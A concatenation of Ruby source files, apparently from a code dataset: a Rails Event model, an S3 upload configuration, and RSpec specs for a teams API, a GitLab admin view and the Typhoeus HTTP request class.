include MarkdownIndexing
include OrderByTitle
include PgSearch::Model
STATUSES = Set.new(%w[active dropped])
CON_MAIL_DESTINATIONS = Set.new(%w[event_email gms])
pg_search_scope(
:title_prefix,
against: :title,
using: {
tsearch: {
dictionary: 'simple_unaccent',
prefix: true,
tsvector_column: 'title_vector'
}
}
)
indexable_markdown_field(:description_for_search) { description }
indexable_markdown_field(:short_blurb_for_search) { short_blurb }
multisearchable(
against: [
:title,
:author,
:organization,
:team_members_for_search,
:description_for_search,
:short_blurb_for_search
],
additional_attributes: ->(event) {
{ convention_id: event.convention_id, hidden_from_search: event.status == 'dropped' }
}
)
register_form_response_attrs :title,
:author,
:email,
:event_email,
:team_mailing_list_name,
:organization,
:url,
:length_seconds,
:can_play_concurrently,
:con_mail_destination,
:description,
:short_blurb,
:registration_policy,
:participant_communications,
:age_restrictions,
:age_restrictions_description,
:minimum_age,
:content_warnings
# Most events belong to the user who proposes it. Some (like ConSuite or
# Ops) are owned by the department head
belongs_to :owner, class_name: 'User', optional: true
# LARPs have GMs and Panels have Panelists
has_many :team_members, dependent: :destroy
# The user who last updated the event. Used for tracking
belongs_to :updated_by, class_name: 'User', optional: true
belongs_to :convention
belongs_to :event_category
has_many :maximum_event_provided_tickets_overrides, dependent: :destroy
has_many :provided_tickets,
class_name: 'Ticket',
inverse_of: 'provided_by_event',
foreign_key: 'provided_by_event_id'
has_many :event_ratings, dependent: :destroy
# Status specifies the status of the event. It must be one of
# "active" or "dropped".
validates :status, inclusion: { in: STATUSES }
validates :con_mail_destination, inclusion: { in: CON_MAIL_DESTINATIONS }
# All events for a Convention must have a unique title. Ignore any events
# that have a status of "Dropped". If they have a duplicate title we don't
# care.
validates :title, presence: true, uniqueness: {
scope: :convention,
conditions: -> { where.not(status: 'dropped') }
}
# The event's registration policy must also be valid.
validate :validate_registration_policy
# Single-run events have to have no more than one run
validate :single_run_events_must_have_no_more_than_one_run, unless: :bypass_single_event_run_check
# Making it slightly harder to change the registration policy unless you really know what
# you're doing
validate :registration_policy_cannot_change, unless: :allow_registration_policy_change
validate :event_category_must_be_from_same_convention
validates :length_seconds, numericality: { greater_than_or_equal_to: 0 }
# Runs specify how many instances of this event there are on the schedule.
# An event may have 0 or more runs.
has_many :runs, dependent: :destroy
has_one :event_proposal, required: false
has_many :form_response_changes, as: :response
after_commit :sync_team_mailing_list, on: [:create, :update]
# Dynamically define one scope per status value: Event.active, Event.dropped.
STATUSES.each do |status|
  scope status, -> { where(status: status) }
end
# Events whose category uses the "regular" scheduling UI.
scope :regular, -> {
  where(event_category_id: EventCategory.where(scheduling_ui: 'regular').select(:id))
}
scope :joins_rating_for_user_con_profile, ->(user_con_profile) do
if user_con_profile
joins(<<~SQL)
LEFT JOIN event_ratings ON (
events.id = event_ratings.event_id
AND user_con_profile_id = #{connection.quote(user_con_profile.id)}
)
SQL
else
self
end
end
scope :with_rating_for_user_con_profile, ->(user_con_profile, rating) do
if user_con_profile
rating_array = rating.is_a?(Array) ? rating : [rating]
joins_rating_for_user_con_profile(user_con_profile)
.where('COALESCE(event_ratings.rating, 0) IN (?)', rating_array)
else
self
end
end
scope :order_by_rating_for_user_con_profile, ->(user_con_profile, direction = nil) do
if user_con_profile
joins_rating_for_user_con_profile(user_con_profile)
.order(Arel.sql("COALESCE(event_ratings.rating, 0) #{direction || 'DESC'}"))
else
self
end
end
scope :with_runs_between, ->(convention, start, finish) do
where(id: convention.runs.between(start, finish).select(:event_id))
end
serialize :registration_policy, ActiveModelCoder.new('RegistrationPolicy')
attr_accessor :bypass_single_event_run_check, :allow_registration_policy_change
# URL slug combining the numeric id with the parameterized title,
# e.g. "42-my-event".
def to_param
  [id, title.parameterize].join("-")
end
# Returns an EventDrop wrapping this event — presumably the hook Liquid
# calls when rendering templates (NOTE(review): confirm against the Liquid
# integration).
def to_liquid
  EventDrop.new(self)
end
# The form for this event, taken from its event category's configuration.
def form
  event_category.event_form
end
# Names of visible team members; feeds the multisearchable index above.
def team_members_for_search
  team_members.visible.includes(:user_con_profile).map { |member| member.name }
end
# Scopes mailing-list-name conflict detection: when checking EventProposal
# records, exclude the proposal tied to this event (it legitimately shares
# the list name); all other model classes use the inherited behaviour.
def other_models_for_team_mailing_list_conflicts(model_class)
  return super unless model_class == EventProposal
  super.where.not(event_id: id)
end
private
# Copies the registration policy's own validation errors onto this event,
# namespaced as "registration_policy.<attribute>". No-op when there is no
# policy or the policy is valid.
def validate_registration_policy
  policy = registration_policy
  return if !policy || policy.valid?

  policy.errors.each do |attribute, error|
    errors.add "registration_policy.#{attribute}", error
  end
end
# Active events in a single-run category may have at most one scheduled run.
def single_run_events_must_have_no_more_than_one_run
  if event_category.single_run? && status == 'active' && runs.size > 1
    errors.add(:base, "#{event_category.name} events must have no more than one run")
  end
end
# Guards against accidental registration-policy edits on persisted events:
# the supported path is EventChangeRegistrationPolicyService (see message).
# Skipped entirely for new records and when the attribute is unchanged.
def registration_policy_cannot_change
  return if new_record?
  return unless registration_policy_changed?
  before, after = changes['registration_policy']
  return if before == after # ActiveRecord is being overzealous about change detection
  errors.add :registration_policy, "cannot be changed via ActiveRecord on an existing event. \
Use EventChangeRegistrationPolicyService instead."
end
# An event's category must belong to the same convention as the event itself.
def event_category_must_be_from_same_convention
  return if convention == event_category.convention
  errors.add :event_category, "is from #{event_category.convention.name} but this event is in \
#{convention.name}"
end
# after_commit hook: schedules a team mailing-list sync job, but only when
# the Mailgun integration is configured.
def sync_team_mailing_list
  SyncTeamMailingListJob.perform_later(self) if SyncTeamMailingListService.mailgun
end
end
| 31.136201 | 100 | 0.696098 |
edb8869418b218c460910100298e0fc26342fc52 | 547 | if Rails.env.production?
# Store uploads on Amazon S3 via Fog; credentials come from the environment.
CarrierWave.configure do |config|
  config.root      = Rails.root.join('tmp')
  config.cache_dir = 'carrierwave'
  config.fog_credentials = {
    provider:              'AWS',
    aws_access_key_id:     ENV['S3_ACCESS_KEY'], # required
    aws_secret_access_key: ENV['S3_SECRET_KEY'], # required
    region:                'us-east-2'
  }
  config.fog_directory = ENV['S3_BUCKET']
end
end
| 32.176471 | 85 | 0.568556 |
f777c2c15c46fc50e0a7189088037b672c83ba01 | 22,545 |
require "spec_helper"
describe "TEAMS API::" , :type => :api do
# Shared fixtures: +team+ is a factory-built team (with users and projects),
# +user+/+project+ come from that team, and +admin+ is an independent admin.
let (:team) {FactoryGirl.create(:team)}
let (:user) {team.users.first}
let (:project) { team.projects.first }
let (:admin) {FactoryGirl.create(:user, :admin)}
# GET /teams — listing behaviour for members, admins, and bad/missing tokens.
describe 'list all teams' do
  context 'as a non-admin' do
    before do
      # Extra team the user does NOT belong to, to prove scoping below.
      FactoryGirl.create(:team, users_count: 0)
      header 'User-Token', user.user_tokens.first.token
      get "/teams"
    end
    it 'responds successfully' do
      expect(last_response.status).to eq 200
    end
    # Non-admins only see teams they belong to.
    it 'should return all users teams' do
      expect(json).to include('teams')
      expect(json['teams'].count).to eq user.teams.count
    end
    it 'does not return all teams' do
      expect(json).to include('teams')
      expect(json['teams'].count).to_not eq Team.count
    end
  end
  context 'as an admin' do
    before do
      3.times do
        FactoryGirl.create(:team)
      end
      header 'User-Token', admin.user_tokens.first.token
      get "/teams"
    end
    it 'responds successfully', :show_in_doc do
      expect(last_response.status).to eq 200
    end
    # Admins see every team in the system.
    it 'should return all teams' do
      expect(json).to include('teams')
      expect(json['teams'].count).to eq Team.count
    end
  end
  context 'without user token' do
    before do
      header 'User-Token', nil
      get "/teams"
    end
    it_behaves_like 'an unauthenticated request'
  end
  context 'with expired user token' do
    before do
      admin.user_tokens.first.update(expires: DateTime.now - 1.day)
      header 'User-Token', admin.user_tokens.first.token
      get "/teams"
    end
    it_behaves_like 'an unauthenticated request'
  end
  context 'with invalid user token' do
    before do
      header 'User-Token', 'asdfasdfasdfasdf'
      get "/teams"
    end
    it_behaves_like 'an unauthenticated request'
  end
end
describe 'get team details' do
context 'with invalid team id' do
before do
header 'User-Token', user.user_tokens.first.token
get "/teams/-1"
end
it_behaves_like 'a not found request'
end
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
header 'User-Token', admin.user_tokens.first.token
get "/teams/#{other_team.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should access any team regardless of team' do
expect(last_response.status).to eq 200
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
end
it 'should be able to access team viewable by user' do
get "/teams/#{team.id}"
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should not be able to access team not viewable by user' do
other_team = FactoryGirl.create(:team, users_count: 0)
get "/teams/#{other_team.id}"
expect(last_response.status).to eq 403
expect(json).to include('error')
end
end
context 'without user token' do
before do
header 'User-Token', nil
get "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
get "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
get "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
end
describe 'create new team' do
context 'as an admin' do
before do
header 'User-Token', admin.user_tokens.first.token
end
it 'responds successfully', :show_in_doc do
post "/teams", {team: FactoryGirl.attributes_for(:team)}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 200
expect(json).to include 'team'
end
it 'should create team' do
expect { post "/teams", {team: FactoryGirl.attributes_for(:team)}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' } }
.to change { Team.count }.by(1)
end
context 'without' do
it 'description should fail' do
post "/teams", {team: FactoryGirl.attributes_for(:team, description: nil)}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 400
expect(json).to include('error')
end
it 'name should fail' do
post "/teams", {team: FactoryGirl.attributes_for(:team, name: nil)}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 400
expect(json).to include('error')
end
end
end
context 'with duplicate name' do
it 'should return an error' do
header 'User-Token', admin.user_tokens.first.token
post "/teams", {team: {name: team.name}}.to_json , { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 400
expect(json).to include 'error'
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
post "/teams", FactoryGirl.attributes_for(:team).to_json , { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'a forbidden request'
end
context 'without user token' do
before do
header 'User-Token', nil
post "/teams", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
post "/teams", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
post "/teams", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
end
describe 'update existing team' do
context 'as an admin' do
before do
header 'User-Token', admin.user_tokens.first.token
end
it 'responds successfully', :show_in_doc do
put "/teams/#{team.id}", {team: {name: 'Some New Name'}}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 200
expect(json).to include 'team'
end
context 'should update' do
it 'name' do
team = FactoryGirl.create(:team)
put "/teams/#{team.id}", {team: {name: 'New Name'}}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(json['team']).to include 'name'
expect(json['team']['name']).to eq ('New Name')
expect(Team.last.name).to eq ('New Name')
end
it 'description' do
team = FactoryGirl.create(:team)
put "/teams/#{team.id}", {team: {description: 'Some new description'}}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(json['team']).to include 'description'
expect(json['team']['description']).to eq ('Some new description')
expect(Team.last.description).to eq ('Some new description')
end
end
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
put "/teams/-1", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'a not found request'
end
context 'with duplicate name' do
it 'should return an error' do
name = FactoryGirl.create(:team).name
header 'User-Token', admin.user_tokens.first.token
post "/teams", {team: {name: name}}.to_json , { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
expect(last_response.status).to eq 400
expect(json).to include 'error'
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
put "/teams/#{team.id}", {team: {name: 'A New Name'}}.to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'a forbidden request'
end
context 'without user token' do
before do
header 'User-Token', nil
put "/teams/#{team.id}", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
put "/teams/#{team.id}", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
put "/teams/#{team.id}", FactoryGirl.attributes_for(:team).to_json, { 'CONTENT_TYPE' => 'application/json', 'ACCEPT' => 'application/json' }
end
it_behaves_like 'an unauthenticated request'
end
end
describe 'delete existing team' do
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
delete "/teams/#{team.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid id' do
before do
header 'User-Token', admin.user_tokens.first.token
delete "/teams/-1"
end
it_behaves_like 'a not found request'
end
context 'as an admin' do
before do
header 'User-Token', admin.user_tokens.first.token
delete "/teams/#{team.id}"
end
it 'responds succesfully' do
expect(last_response.status).to eq 200
end
it 'returns user details', :show_in_doc do
expect(json).to include('team')
end
end
context 'without user token' do
before do
header 'User-Token', nil
delete "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
delete "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
delete "/teams/#{team.id}"
end
it_behaves_like 'an unauthenticated request'
end
end
describe 'add user to team' do
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
user = FactoryGirl.create(:user)
@team_count = other_team.users.count
header 'User-Token', admin.user_tokens.first.token
post "/teams/#{other_team.id}/user/#{user.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should add user to team' do
expect(json).to include('team')
expect(json['team']).to include('users')
expect(json['team']['users'].count).to eq (@team_count +1)
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
user = FactoryGirl.create(:user)
post "/teams/-1/user/#{user.id}"
end
it_behaves_like 'a not found request'
end
context 'with invalid user id' do
before do
header 'User-Token', admin.user_tokens.first.token
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/-1"
end
it_behaves_like 'a not found request'
end
context 'without user token' do
before do
header 'User-Token', nil
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
user = FactoryGirl.create(:user)
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with user already on team' do
before do
header 'User-Token', admin.user_tokens.first.token
user = team.users.first
post "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'a bad request'
end
end
describe 'add project to team' do
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
project = FactoryGirl.create(:project)
@team_count = other_team.projects.count
header 'User-Token', admin.user_tokens.first.token
post "/teams/#{other_team.id}/project/#{project.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should add user to team' do
expect(json).to include('team')
expect(json['team']).to include('projects')
expect(json['team']['projects'].count).to eq (@team_count +1)
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
project = FactoryGirl.create(:project)
post "/teams/-1/project/#{project.id}"
end
it_behaves_like 'a not found request'
end
context 'with invalid project id' do
before do
header 'User-Token', admin.user_tokens.first.token
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/-1"
end
it_behaves_like 'a not found request'
end
context 'without user token' do
before do
header 'User-Token', nil
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
project = FactoryGirl.create(:project)
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with user already on team' do
before do
header 'User-Token', admin.user_tokens.first.token
project = team.projects.first
post "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'a bad request'
end
end
describe 'remove user from team' do
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
user = other_team.users.first
@team_count = other_team.users.count
header 'User-Token', admin.user_tokens.first.token
delete "/teams/#{other_team.id}/user/#{user.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should add user to team' do
expect(json).to include('team')
expect(json['team']).to include('users')
expect(json['team']['users'].count).to eq (@team_count -1)
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
user = FactoryGirl.create(:user)
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
user = team.users.first
delete "/teams/-1/user/#{user.id}"
end
it_behaves_like 'a not found request'
end
context 'with invalid user id' do
before do
header 'User-Token', admin.user_tokens.first.token
user = team.users.first
delete "/teams/#{team.id}/user/-1"
end
it_behaves_like 'a not found request'
end
context 'without user token' do
before do
header 'User-Token', nil
user = team.users.first
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
user = team.users.first
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
user = team.users.first
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with user not on team' do
before do
header 'User-Token', admin.user_tokens.first.token
user = FactoryGirl.create(:user)
delete "/teams/#{team.id}/user/#{user.id}"
end
it_behaves_like 'a bad request'
end
end
describe 'remove project from team' do
context 'as an admin' do
before do
other_team = FactoryGirl.create(:team)
project = other_team.projects.first
@team_count = other_team.projects.count
header 'User-Token', admin.user_tokens.first.token
delete "/teams/#{other_team.id}/project/#{project.id}"
end
it 'responds succesfully', :show_in_doc do
expect(last_response.status).to eq 200
expect(json).to include('team')
end
it 'should add user to team' do
expect(json).to include('team')
expect(json['team']).to include('projects')
expect(json['team']['projects'].count).to eq (@team_count -1)
end
end
context 'as a non-admin' do
before do
header 'User-Token', user.user_tokens.first.token
project = team.projects.first
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'a forbidden request'
end
context 'with invalid team id' do
before do
header 'User-Token', admin.user_tokens.first.token
project = team.projects.first
delete "/teams/-1/project/#{project.id}"
end
it_behaves_like 'a not found request'
end
context 'with invalid project id' do
before do
header 'User-Token', admin.user_tokens.first.token
project = team.projects.first
delete "/teams/#{team.id}/project/-1"
end
it_behaves_like 'a not found request'
end
context 'without user token' do
before do
header 'User-Token', nil
project = team.projects.first
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with expired user token' do
before do
admin.user_tokens.first.update(expires: DateTime.now - 1.day)
header 'User-Token', admin.user_tokens.first.token
project = team.projects.first
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with invalid user token' do
before do
header 'User-Token', 'asdfasdfasdfasdf'
project = team.projects.first
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'an unauthenticated request'
end
context 'with project not on team' do
before do
header 'User-Token', admin.user_tokens.first.token
project = FactoryGirl.create(:project)
delete "/teams/#{team.id}/project/#{project.id}"
end
it_behaves_like 'a bad request'
end
end
end
| 26.337617 | 166 | 0.615702 |
392d43ef2d44f38bd1d0c73f7549ae3f2ffea6ba | 865 | # frozen_string_literal: true
require 'spec_helper'
# View spec for the admin "Integrations" settings page, focused on the
# Sourcegraph section's conditional rendering.
describe 'admin/application_settings/integrations.html.haml' do
  let(:app_settings) { build(:application_setting) }

  describe 'sourcegraph integration' do
    let(:sourcegraph_flag) { true }

    before do
      assign(:application_setting, app_settings)
      allow(Gitlab::Sourcegraph).to receive(:feature_available?).and_return(sourcegraph_flag)
    end

    context 'when sourcegraph feature is enabled' do
      it 'shows the form' do
        render

        expect(rendered).to have_field('application_setting_sourcegraph_enabled')
      end
    end

    context 'when sourcegraph feature is disabled' do
      let(:sourcegraph_flag) { false }

      # Description fixed: this example asserts the field is ABSENT, but was
      # labelled "show the form" — a copy-paste of the enabled case.
      it 'does not show the form' do
        render

        expect(rendered).not_to have_field('application_setting_sourcegraph_enabled')
      end
    end
  end
end
| 24.714286 | 93 | 0.708671 |
e22b8ce1e615ec44411c13afebfff5f3c5b27859 | 12,559 | require 'spec_helper'
describe Typhoeus::Request do
let(:url) { "http://www.google.com" }
let(:options) { {} }
let(:request) { Typhoeus::Request.new(url, options) }
describe "#inspect" do
let(:url) { "http://www.google.com" }
let(:options) do
{ :body => "a=1&b=2",
:params => { :c => 'ok' },
:method => :get,
:headers => { 'Content-Type' => 'text/html' } }
end
it "dumps out the URI" do
request.inspect.should match(/http:\/\/www\.google\.com/)
end
it "dumps out the body" do
request.inspect.should match(/a=1&b=2/)
end
it "dumps params" do
request.inspect.should match(/:c\s*=>\s*"ok"/)
end
it "dumps the method" do
request.inspect.should match(/:get/)
end
it "dumps out headers" do
request.inspect.should match(/"Content-Type"\s*=>\s*"text\/html"/)
end
end
describe "#marshal_dump" do
let(:url) { "http://www.google.com" }
['on_complete', 'after_complete'].each do |name|
context "when #{name} handler" do
before { request.instance_variable_set("@#{name}", Proc.new{}) }
it "doesn't include @#{name}" do
request.send(:marshal_dump).map(&:first).should_not include("@#{name}")
end
it "doesn't raise when dumped" do
expect { Marshal.dump(request) }.to_not raise_error
end
context "when loading" do
let(:loaded) { Marshal.load(Marshal.dump(request)) }
it "includes url" do
loaded.url.should eq(request.url)
end
it "doesn't include #{name}" do
loaded.send(name).should be_nil
end
end
end
end
end
describe "#localhost?" do
["localhost", "127.0.0.1", "0.0.0.0"].each do |host|
context "when host is #{host}" do
let(:url) { "http://#{host}" }
it "returns true" do
request.should be_localhost
end
end
end
context "when host is other" do
let(:url) { "http://www.google.com" }
it "return true" do
request.should_not be_localhost
end
end
end
describe "#params_string" do
context "when keys are strings" do
let(:options) do
{ :params => {
'b' => 'fdsa',
'a' => 'jlk',
'c' => '789' } }
end
it "returns string" do
request.params_string.should be_a(String)
end
it "sorts keys" do
request.params_string.should eq("a=jlk&b=fdsa&c=789")
end
end
context "when keys are symbols" do
let(:options) do
{ :params => {
:b => 'fdsa',
:a => 'jlk',
:c => '789' } }
end
it "returns string" do
request.params_string.should be_a(String)
end
it "sorts keys" do
request.params_string.should eq("a=jlk&b=fdsa&c=789")
end
end
context "when value is array" do
context "when key has no brackets" do
let(:options) { { :params => { 'a' => ['1', '2'] } } }
it "translates correct" do
request.params_string.should eq("a=1&a=2")
end
end
context "when key has brackets" do
let(:options) { { :params => { 'a[]' => ['1', '2'] } } }
it "translates correct" do
request.params_string.should eq("a%5B%5D=1&a%5B%5D=2")
end
end
end
context "when value is hash" do
let(:options) { { :params => { :a => { :b => { :c => :d } } } } }
it "translates correct" do
request.params_string.should eq("a%5Bb%5D%5Bc%5D=d")
end
end
context "when value is hash with nested array" do
let(:options) { { :params => { :a => { :b => { :c => ['d','e'] } } } } }
it "translates correct" do
request.params_string.should eq("a%5Bb%5D%5Bc%5D=d&a%5Bb%5D%5Bc%5D=e")
end
end
end
describe "quick request methods" do
it "can run a GET synchronously" do
response = Typhoeus::Request.get("http://localhost:3000", :params => {:q => "hi"}, :headers => {:foo => "bar"})
response.code.should == 200
JSON.parse(response.body)["REQUEST_METHOD"].should == "GET"
end
it "can run a POST synchronously" do
response = Typhoeus::Request.post("http://localhost:3000", :params => {:q => { :a => "hi" } }, :headers => {:foo => "bar"})
response.code.should == 200
json = JSON.parse(response.body)
json["REQUEST_METHOD"].should == "POST"
json["rack.request.form_hash"]["q"]["a"].should == "hi"
end
it "can run a PUT synchronously" do
response = Typhoeus::Request.put("http://localhost:3000", :params => {:q => "hi"}, :headers => {:foo => "bar"})
response.code.should == 200
JSON.parse(response.body)["REQUEST_METHOD"].should == "PUT"
end
it "can run a DELETE synchronously" do
response = Typhoeus::Request.delete("http://localhost:3000", :params => {:q => "hi"}, :headers => {:foo => "bar"})
response.code.should == 200
JSON.parse(response.body)["REQUEST_METHOD"].should == "DELETE"
end
end
describe ".new" do
it "takes url as the first argument" do
Typhoeus::Request.new("http://localhost:3000").url.should == "http://localhost:3000"
end
it "should parse the host from the url" do
Typhoeus::Request.new("http://localhost:3000/whatever?hi=foo").host.should == "http://localhost:3000"
Typhoeus::Request.new("http://localhost:3000?hi=foo").host.should == "http://localhost:3000"
Typhoeus::Request.new("http://localhost:3000").host.should == "http://localhost:3000"
end
it "takes method as an option" do
Typhoeus::Request.new("http://localhost:3000", :method => :get).method.should == :get
end
it "takes headers as an option" do
headers = {:foo => :bar}
request = Typhoeus::Request.new("http://localhost:3000", :headers => headers)
request.headers.should == headers
end
it "takes params as an option and adds them to the url" do
Typhoeus::Request.new("http://localhost:3000", :params => {:foo => "bar"}).url.should == "http://localhost:3000?foo=bar"
end
it "takes request body as an option" do
Typhoeus::Request.new("http://localhost:3000", :body => "whatever").body.should == "whatever"
end
it "takes timeout as an option" do
Typhoeus::Request.new("http://localhost:3000", :timeout => 10).timeout.should == 10
end
it "accepts a string for the timeout option" do
Typhoeus::Request.new("http://localhost:3000", :timeout => "150").timeout.should == 150
end
it "doesn't convert a nil timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :timeout => nil).timeout.should_not == nil.to_i
end
it "doesn't convert an empty timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :timeout => "").timeout.should_not == "".to_i
end
it "takes connect_timeout as an option" do
Typhoeus::Request.new("http://localhost:3000", :connect_timeout => 14).connect_timeout.should == 14
end
it "accepts a string for the connect_timeout option" do
Typhoeus::Request.new("http://localhost:3000", :connect_timeout => "420").connect_timeout.should == 420
end
it "doesn't convert a nil connect_timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :connect_timeout => nil).connect_timeout.should_not == nil.to_i
end
it "doesn't convert an empty connect_timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :connect_timeout => "").connect_timeout.should_not == "".to_i
end
it "takes cache_timeout as an option" do
Typhoeus::Request.new("http://localhost:3000", :cache_timeout => 60).cache_timeout.should == 60
end
it "accepts a string for the cache_timeout option" do
Typhoeus::Request.new("http://localhost:3000", :cache_timeout => "42").cache_timeout.should == 42
end
it "doesn't convert a nil cache_timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :cache_timeout => nil).cache_timeout.should_not == nil.to_i
end
it "doesn't convert an empty cache_timeout to an integer" do
Typhoeus::Request.new("http://localhost:3000", :cache_timeout => "").cache_timeout.should_not == "".to_i
end
it "takes follow_location as an option" do
Typhoeus::Request.new("http://localhost:3000", :follow_location => true).follow_location.should == true
end
it "takes max_redirects as an option" do
Typhoeus::Request.new("http://localhost:3000", :max_redirects => 10).max_redirects.should == 10
end
it "has the associated response object" do
request = Typhoeus::Request.new("http://localhost:3000")
request.response = :foo
request.response.should == :foo
end
